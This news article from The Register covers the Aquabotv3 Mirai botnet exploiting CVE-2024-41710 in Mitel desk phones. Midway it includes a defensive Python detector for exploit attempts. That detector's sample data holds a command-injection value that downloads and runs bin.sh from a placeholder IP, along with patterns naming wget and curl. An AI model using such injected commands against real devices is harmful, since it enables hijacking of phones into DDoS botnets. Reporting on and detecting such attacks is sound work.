Beware of DDoSes from Mirai-based botnet of Mitel phones • The Register


01/29/2025


A new variant of the Mirai-based malware Aquabot is actively exploiting a vulnerability in Mitel phones to build a remote-controlled botnet, according to Akamai’s Security Intelligence and Response Team.

In case an army of office phones firing off distributed denial of service (DDoS) attacks against individuals or critical organizations isn’t concerning enough, this latest strain, dubbed Aquabotv3, apparently has a never-seen-before capability that reports back to its command-and-control server when it catches a kill signal – an attempt to terminate the malware – on an infected device.

“We haven’t seen this behavior before in a Mirai variant so perhaps it may become a new feature,” Akamai’s Kyle Lefton and Larry Cashdollar said.

“Although the true reason for this behavior has not been confirmed, this communication to the C2 could be a way for the botnet author to actively monitor the botnet’s health,” the duo wrote Tuesday.

Aquabot, which is based on the Mirai framework, allows miscreants to remotely control infected equipment, and is built for launching DDoS attacks at selected targets. This particular botnet has been around since at least November 2023, and now there are three publicly known versions of the malware.

Third time’s a charm?

Based on its analysis, Akamai determined Aquabotv3 to be a new variant, primarily because of its new functions. In addition to the typical DDoS attack capabilities, Aquabotv3 has a function that sets up a signal handler to check for several kill signals. If any of these are sent to the malware by someone trying to remove the bot, it catches the signal, sets a flag in memory to indicate it's been caught, and then reports back to C2. Crafty.

As of earlier this month, Aquabotv3 has been spotted exploiting CVE-2024-41710, a command injection vulnerability that affects some Mitel phones. Specifically, the bug is present in the Mitel 6800, 6900, and 6900w series of SIP desk phones, including the 6970 Conference Unit, through firmware R6.4.0.HF1 (R6.4.0.136). It was patched in July last year.

The NIST CVE database entry for the flaw says it can be exploited across a network by an authenticated attacker with administrative privileges to execute arbitrary operating-system commands, giving the miscreant full root-level control over the device. Presumably, the authentication requirement for exploitation isn't a terribly high barrier, as far too many owners of the phones don't change the username and password from the defaults, allowing the equipment to be hijacked by other devices on the network using simple guesswork or brute force.

Packetlabs' researcher Kyle Burns, who found and reported the vulnerability to Mitel, last August published details of a proof-of-concept (PoC) attack in which an HTTP POST request to 8021xsupport.html on a vulnerable phone can overwrite a configuration file so that, during its next boot, the phone executes commands injected by the attacker in that request.

How to catch a botnet

Months later, “Akamai SIRT detected exploit attempts targeting this vulnerability through our global network of honeypots in early January 2025 using a payload almost identical to the PoC,” Lefton and Cashdollar wrote.

The injected commands caught in Akamai's honeypots attempt to "fetch and execute a shell script called 'bin.sh,' which will in turn fetch and execute Mirai malware on the target system," they explained. The malware supports several architectures, including x86 and Arm.
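The PoC shape described above (a POST to 8021xsupport.html carrying injected commands) and the honeypot hits that fetch bin.sh give a defender two concrete things to look for in captured requests to a phone's web interface. The following is an added detection example, not code from Akamai, Packetlabs or Mitel; the capture records, form field names and the 10.0.0.0/24 management subnet are constructed assumptions.

```python
import re
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple

# Hosts that are allowed to push configuration to the phones (assumed; set to your site's admin subnet).
MANAGEMENT_NETS = [ip_network("10.0.0.0/24")]

# Indicators taken from the article: a POST to 8021xsupport.html whose form data carries
# shell command separators or a download-and-run of a script such as bin.sh.
TARGET_PATH = "/8021xsupport.html"
SHELL_META = re.compile(r"[;|`]|\$\(")          # '&' is a normal form separator, so it is excluded
FETCH_AND_RUN = re.compile(r"\b(wget|curl|tftp)\b.*\.sh\b|\bbin\.sh\b", re.IGNORECASE)

# Constructed capture records (e.g. from a honeypot or a reverse proxy that logs request bodies).
SAMPLE_CAPTURE: List[Dict[str, str]] = [
    {"src": "10.0.0.5", "method": "POST", "path": "/8021xsupport.html", "body": "mode=eap-md5&identity=phone42"},
    {"src": "203.0.113.7", "method": "POST", "path": "/8021xsupport.html",
     "body": "identity=x;wget http://198.51.100.9/bin.sh;sh bin.sh"},
    {"src": "203.0.113.7", "method": "GET", "path": "/8021xsupport.html", "body": ""},
    {"src": "192.0.2.10", "method": "POST", "path": "/8021xsupport.html", "body": "identity=phone7"},
]


def classify(record: Dict[str, str]) -> List[str]:
    """Return the reasons a single captured request looks like CVE-2024-41710 abuse (empty if benign)."""
    reasons: List[str] = []
    if record["path"].lower() != TARGET_PATH or record["method"].upper() != "POST":
        return reasons                      # only config-writing POSTs to the 802.1X page matter
    src = ip_address(record["src"])
    if not any(src in net for net in MANAGEMENT_NETS):
        reasons.append("config POST from outside management network")
    body = record.get("body", "")
    if SHELL_META.search(body):
        reasons.append("shell metacharacters in config form")
    if FETCH_AND_RUN.search(body):
        reasons.append("download-and-execute of a shell script in config form")
    return reasons


def scan(records: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run classify() over a capture and keep only the records that raised at least one reason."""
    return [(r["src"], reasons) for r in records if (reasons := classify(r))]


if __name__ == "__main__":
    for src, why in scan(SAMPLE_CAPTURE):
        print(f"{src}: {', '.join(why)}")
```

The out-of-network rule fires even when the body looks clean (the fourth record), which is the useful signal when default credentials make "authenticated" a weak filter.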

We asked the Akamai team about the need for authentication to exploit CVE-2024-41710, and whether it was truly necessary or an error in the description. “That could certainly be possible, but we do not have a proper way to test it against Mitel devices ourselves to confirm,” Lefton told The Register.

“Normally, an attacker could still exploit this by authenticating to the target device, which botnets often do using various default credentials,” Lefton added. “Our honeypots did not capture default creds being passed in this instance.”

In addition to the Mitel phone vulnerability, the threat intel team spotted the same Aquabot malware spreading through a Hadoop YARN remote-code execution hole; CVE-2018-17532; CVE-2023-26801; CVE-2022-31137; a Linksys E-series RCE; CVE-2018-10562; and CVE-2018-10561.

“Although the filenames differ from the straightforward ‘Aqua’ naming from the Mitel exploit attempts, the malware from these other exploits appears to be the same,” the researchers noted. ®
